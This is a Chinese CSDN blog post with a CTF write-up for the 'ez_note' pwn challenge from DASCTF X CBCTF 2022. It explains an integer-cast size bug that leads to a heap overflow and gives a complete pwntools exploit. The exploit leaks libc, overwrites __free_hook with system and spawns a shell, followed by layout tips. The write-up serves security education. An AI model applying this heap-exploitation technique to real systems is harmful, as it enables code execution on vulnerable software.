DASCTF X CBCTF 2022九月挑战赛 ez_note wp

已于 2022-10-03 16:07:16 修改
阅读量165 收藏
点赞数
分类专栏: pwn刷题wp 文章标签: 安全 linux c++
于 2022-10-03 16:05:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65147345/article/details/127153140
版权

题目分析

  1. 我只能说出题的师傅好样的,>_<
  2. 平常题目的字符串转整型的函数是这样的atoi(),没错是i,这个是atol()
  3. 其区别就是一个转int,一个转long
  4. 申请chunk判断时却用了int强制类型转换,例如我们申请0x100000080,实际申请的是malloc(0x80),但是输入内容的时候我们可以输入0x100000080,故该题目变成普通的heap溢出题
    在这里插入图片描述

在这里插入图片描述


from pwn import *
context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',29430)
c=process(b'./ez_note')

libc=ELF(b'./libs/2.31-0ubuntu9.7_amd64/libc-2.31.so')


gdb.attach(c,'''


b *$rebase(0x146F)
b *$rebase(0x1629)
b *$rebase(0x15bb)




''')



def add(size,content):
	c.sendafter(b'choice:',b'1')
	c.sendafter(b'size:',str(size))
	c.sendafter(b'content:',content)
	
	

def free(idx):
	c.sendafter(b'choice:',b'2')
	c.sendafter(b'ID:',str(idx))
	
	

def show(idx):
	c.sendafter(b'choice:',b'3')
	c.sendafter(b'ID:',str(idx))
	
	
	
for i in range(10):
	add(0x90,b'a')


for i in range(3,10):
	free(i)
	

free(0)
free(1)
free(2)

for i in range(5):	#0 1 2 3 4
	add(0x90,b'b')

add(0x90,p64(0x200)+p64(0x90))#5
add(0x90,b'a')#6
add(0x100000080,b'a'*0x80+p64(0)+p64(0x201)[:7])#7


add(0x140,b'a')
show(6)

c.recvuntil(b'Note content:')
libc_base=u64(c.recv(6).ljust(8,b'\x00'))-0x1ecbe0
log.success("libc_base="+hex(libc_base))


sys=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']

free(0)
free(1)
free(2)

add(0x100000090,b'a'*0x90+p64(0)+p64(0xa1)+p64(free_hook)[:7])#0
add(0x90,b'/bin/sh\x00')#1
add(0x90,p64(sys))#2

free(1)

c.interactive()

注意点

当然啦,heap题目重要的还是学习heap布局

  1. 程序会把输入内容中的最后一个字节赋值为0,所以需要注意我们改写size的时候,如果直接写p64(0x201),则后面的fd的末字节会被修改为0,从而报错,使用[:7]可以解决这个问题,后面他补0时就可以把少写的0补上了,p64()是倒叙的
  2. 申请释放chunk时注意顺序,进入tcache后再申请出来,是原来基础上的倒叙,需要注意chunk的编号exp的heap布局不清楚,建议复制粘贴后,gdb看+画图就很直观了

参考blog wp

Mauricio_Davis
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ez_note:iOS最终项目
05-19
ez_note iOS最终项目
DASCTF部分复现
qq_63928796的博客
08-08 2194
过滤了大括号 {{,我们可以用 {%print(......)%} 或 {% if ... %}1{% endif %} 的形式来代替,但是题目还过滤了 print 关键字,所以前者用不了了,只能用 {% if ... %}success{% endif %} 的形式来bypass了。因为whatisthis里头的数字,有的很大,我们尝试生成一个小数点长度在10000的圆周率出来,看看能得到什么,圆周率生成的脚本用的是下面这个网址的大佬的脚本。首先利用FTK挂载一下vmdk文件,得到加密的磁盘。...
DASCTF X CBCTF 2022九月挑战赛-Pwn
qq_34010404的博客
09-19 546
buf 后面跟着一个libc的地址,可以leak libc 的基址下面跟着一个格式串漏洞,puts里面调用的strlen,改那个got为one_gadget 即可(这个题刚好有一个满足的gadget)栈溢出,但是只能覆盖返回地址,栈迁移做就行UAF 可以改fd (加或减去一个偏移)
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
FUCKING12的博客
10-06 1858
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
DASCTF X GFCTF 2022十月挑战赛 Writeup
末初的CSDN博客
10-28 1831
DASCTF X GFCTF 2022十月挑战赛 Writeup
DASCTF X GFCTF 2022十月挑战赛 WriteUp
Whitebird的博客
10-24 3561
DASCTF X GFCTF 2022十月挑战赛 WriteUp
DASCTF X GFCTF 2022十月挑战赛 学习记录
m0_64815693的博客
10-24 2105
DASCTF X GFCTF 2022十月挑战赛
[SWPUCTF 2022 新生赛]ez_ez_unserialize
2301_80553405的博客
02-12 554
创造类x,定义了一个魔术常量x为_FILE_,有定义了几个函数,construct函数让x类中的常量x赋值,wakeup让x重新赋值为_FULE_,destruct函数高亮x常量,如果传参x存在反序列化,否则输出。修改为O:1:"X":2:{s:1:"x";看到提示flag在fllllllag.php中,将代码复制,删掉没有的,加上x序列化。由于要绕过wakeup函数,只要序列化的中的成员数大于实际成员数,即可绕过。打开后是段php代码。
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
weixin_46497491的博客
11-07 3713
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2426
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
ez_setup.py
05-26
安装setuptools的脚本代码
ez_setup.py下载
05-16
ez_setup.py下载
EZ.RAR_EZ_ez-usb_编程器 51
09-19
51编程器喜欢的兄弟可以去做一下,非常适合学单片机,没有编程器的学生
解锁Nginx跨域谜题:3步打造安全高效的CORS策略
2401_85000826的博客
05-16 490
Nginx作为一款强大的Web服务器和反向代理服务器,经常被用于处理跨域资源共享(CORS,Cross-Origin Resource Sharing)策略,以允许或限制不同源之间的资源请求。CORS是一种安全策略,用于决定Web浏览器是否应允许从一个域名加载的网页访问另一个域名下的资源。下面将深入解析如何在Nginx配置中实现对origin(请求来源)的限制,以精确控制跨域请求。
IEN在Web3.0中的性能与安全优势
qq_29268247的博客
05-17 440
通过分布式架构、区块链技术和智能数据管理,IEN不仅提高数据传输效率和处理速度,还大幅增强网络安全性和稳定性。通过命名数据网络,IEN实现了高效的数据分发和缓存机制,减少了数据传输路径,提高了网络吞吐量。对比实验表明,IEN在处理并发请求时的延迟减少了40%,传输速率提高了30%。实验结果显示,面对突发流量时,IEN的吞吐量稳定性提高了35%,有效避免了网络拥塞。实验数据显示,IEN的加密机制将数据泄露事件减少了70%,大幅提升了数据隐私保护水平。IEN整合区块链技术,提供去中心化的信任机制。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 663
作用就是定义属性之间的数学关系
Linux安全】Firewalld防火墙基础
最新发布
weixin_62922268的博客
05-23 260
支持网络区域所定义的网络链接以及接口安全等级的动态防火墙管理工具支持IPv4、IPv6防火墙设置以及以太网桥支持服务或应用程序直接添加防火墙规则接口拥有两种配置模式运行时配置永久配置trusted(信任区域):允许所有的传入流量。public(公共区域):允许与ssh或dhcpv6-client预定义服务匹配的传入流量,其余均拒绝。是新添加网络接口的默认区域。external(外部区域):允许与 ssh 预定义服务匹配的传入流量,其余均拒绝。
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程代码执行等安全问题。根据引用\[2\]中的代码片段,这个挑战可能涉及到通过传递参数来实现SSRF攻击,其中包括目标主机和端口。具体的攻击方法和解决方案需要根据题目的具体要求和环境来确定。 #### 引用[.reference_title] - *1* *2* [SSRF总结](https://blog.csdn.net/weixin_53090346/article/details/129025771)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [2022 SWPU新生赛&HNCTF web部分题目](https://blog.csdn.net/weixin_63231007/article/details/127135455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值